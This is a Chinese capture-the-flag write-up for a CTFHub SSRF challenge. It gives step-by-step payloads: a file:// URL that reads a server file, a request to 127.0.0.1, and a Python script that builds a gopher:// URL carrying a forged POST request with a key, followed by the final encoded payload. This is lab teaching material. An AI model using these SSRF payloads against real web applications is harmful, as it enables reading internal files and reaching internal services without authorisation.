CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
Hiyajo pray32 分钟前
属性sdn隐私保护分析
网络安全
思陌Ai算法定制1 小时前
AFLoc:告别手工标注!多模态视觉-语言模型实现跨模态“零标注“病灶定位,34种胸部疾病检测超越人类专家
经验分享
CoreTK芯通康EMC整改1 小时前
2026 华南 EMI 整改服务商推荐
网络·经验分享·emc整改案例·emc整改
Hiyajo pray2 小时前
属性sdn的隐私保护策略(1)
网络安全
上海光华专利事务所3 小时前
【新闻资讯】《机电行业专利申请的撰写及审查答辩指南》发布
经验分享
HackTwoHub3 小时前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构
杭州默安科技3 小时前
从告警到多防火墙联动封禁:智能体与XDR的自动化响应实践
人工智能·网络安全
浩瀚地学4 小时前
【Java基础复习】IO流(二)
java·开发语言·经验分享·笔记·学习
卡梅德生物科技小能手4 小时前
卡美德生物科普:CD226(DNAM-1)在干细胞培养中的功能机制与应用
经验分享·深度学习·生活
云栖梦泽在5 小时前
跨境电商账号频繁验证怎么办?从公网 IP、ASN、浏览器环境到登录稳定性排查
网络·网络协议·tcp/ip·网络安全·性能优化